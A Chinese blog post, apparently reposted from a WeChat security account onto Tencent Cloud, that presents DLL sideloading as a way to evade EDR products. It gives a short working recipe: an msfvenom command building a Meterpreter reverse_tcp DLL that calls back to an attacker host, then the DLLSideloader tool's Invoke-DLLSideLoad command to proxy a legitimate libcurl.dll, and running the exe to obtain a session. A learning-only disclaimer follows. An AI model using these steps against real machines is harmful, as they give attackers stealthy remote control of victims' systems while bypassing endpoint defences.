专栏首页鸿鹄实验室Sideloading DLL攻击

Sideloading DLL攻击

今天看到了国外的一个白皮书,地址如下:

https://res.mdpi.com/d_attachment/jcp/jcp-01-00021/article_deploy/jcp-01-00021.pdf

内容主要是各类技术在遇到EDR时能不能成功的绕过。

最后以一份表格总结了各类功能以及绕过效果:

我们可以看到,dll几乎绕过了所有的EDR,而这里的DLL指的便是Sideloading DLL。

Sideloading DLL最早应该是在一份APT报告中被提出来的,即DLL侧加载。

文档地址:

https://www.recordedfuture.com/apt10-cyberespionage-campaign/?__cf_chl_jschl_tk__=pmd_VKrHUzdleNocPJnRemvxCVGmjY8gkMwlsZM361GthcI-1629625791-0-gqNtZGzNAjujcnBszQil

原理如下:

即中间经过转发来加载恶意dll。

利用方法:

首先找到一个存在dll加载(或劫持)的程序,然后使用msf生成dll

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f dll -a x86 > payload.dll

然后使用DLLSideloader来生成我们的转发dll,工具地址:

https://github.com/SkiddieTech/DLLSideloader

然后生成所需的文件即可

Invoke-DLLSideLoad libcurl.dll payload.dll

然后执行exe文件,即可获取session。

请严格遵守网络安全法相关条例!此分享主要用于学习,切勿走上违法犯罪的不归路,一切后果自付!

本文分享自微信公众号 - 鸿鹄实验室(gh_a2210090ba3f),作者:鸿鹄实验室a

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2021-08-22

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 使用WFH搜索Windows可执行程序中的常见漏洞或功能

    WFH,全名为Windows Feature Hunter,即Windows功能搜索工具,该工具基于Python开发,使用Frida实现其功能,可以帮助广大研究...

    FB客服
  • 远控木马Posion Ivy开始肆虐缅甸和其它亚洲国家

    臭名昭著的远程控制木马Poison Ivy(后面称作PIVY)最近开始重新露出水面。并且出现了一些新行为。过去一年,已经发现PIVY为了种种企图攻击了许多亚洲国...

    FB客服
  • DLL攻击漫谈

    动态链接库(DLL)的方式以及Windows API指示使用它们的方式都可以用作任意代码执行的接口,并协助恶意行为者实现其目标。

    黑白天安全
  • 安全研究 | 使用ScareCrow框架实现EDR绕过

    ScareCrow是一款功能强大的Payload创建框架,可以帮助广大研究人员生成用于向合法Windows金册灰姑娘中注入内容的加载器,以绕过应用程序白名单控制...

    FB客服
  • Windows 权限提升

    本篇内容是内网安全攻防:渗透测试实战指南时的阅读笔记,笔记大部分内容均来自此书,另外一部分来源于一些公开文档和非公开文档,参考链接中均有注明。

    重生信息安全
  • dll 劫持和应用

    2020年12月,SolarWinds 攻击事件引发全球的关注(https://us-cert.cisa.gov/ncas/alerts/aa20-352a),...

    Seebug漏洞平台
  • DLL代理加载shellcod用于免杀,维权等等

    DLL侧面加载或DLL代理加载允许攻击者滥用合法的和经过签名的可执行文件,以在受感染的系统上执行代码。自2017年以来,这种技术一直很流行。

    黑白天安全
  • AVGater漏洞突破防病毒软件 影响大批知名杀毒软件 PoC已经公开

    用户1697231
  • Netwalker无文件勒索软件分析

    攻击者正不断研究更复杂的方式逃避恶意软件检测,近期发现攻击者利用PowerShell编写Netwalker勒索软件,直接在内存中执行,没有将实际的勒索软件二进制...

    FB客服
  • 弹性边界:如何利用环境变量进行提权

    简介 尽管进程都设置了环境变量,它们往往被用户,开发者甚至是系统本身所忽略。对于一个像样的系统来说,环境变量就是其最根本,这里的系统包括但不仅限于Unix (...

    FB客服
  • 解包分析攻击越南机场和其它组织机构的间谍程序

    根据我们接触到了前期入侵越南组织机构的间谍程序捕获样本,入侵活动涉及7月底对越南两大机场的攻击事件,攻击中使用的恶意软件用于窃取越南航空公司40万会员信息。 这...

    FB客服
  • APT32样本分析

    该恶意文档,共被植入了三段恶意宏代码,宏的主要功能为在内存中加载执行该恶意文档中以十六进制流方式储存的Shellcode代码。

    FB客服
  • “寄生兽”(DarkHotel)针对中国外贸人士的最新攻击活动披露

    腾讯御见威胁情报中心曾在2018年4月披露过"寄生兽"(DarkHotel)在2018年针对中国外贸企业高管的定向攻击活动。近期,我们再次检测到该攻击组织的最新...

    FB客服
  • NSA武器库之Eternalchampion(永恒冠军)复现

    准备工作 攻击机1:带有漏洞利用工具集的XP,并且此次需要准备好WinHex, IP 172.26.97.35 攻击机2:Kali, IP 172.26.97....

    FB客服
  • beSTORM之DLL Fuzz入门教程

    1、beSTORM简介 beSTORM是一款安全评估工具,在开发周期中,供应商可以使用beSTORM全面分析网络软件应用,发现全新和未知的漏洞。 beSTORM...

    FB客服
  • 在Windows中劫持DLL

    DLL劫持是一种用于执行恶意有效负载的流行技术,这篇文章列出了将近300个可执行文件,它们容易受到Windows 10(1909)上相对路径DLL劫持的攻击,并...

    Al1ex
  • 多家反病毒软件存在AVGater问题,恶意软件反可利用隔离区提权

    用户1697231
  • 利用Pentestbox打造MS17-010移动杀器

    1、前言 前段时间Shadow Broker披露了 Windows大量漏洞,甚至爆出黑客组织 Equation Group 对于Windows 远程漏洞 MS1...

    FB客服
  • 利用COVID-19发起的网络攻击分析

    Check Point发现了针对蒙古公共部门的网络攻击活动,该组织利用了冠状病毒恐慌情绪向目标发送恶意软件。研究发现其与可与在2016年进行的其他网络活动联系起...

    FB客服

扫码关注云+社区

领取腾讯云代金券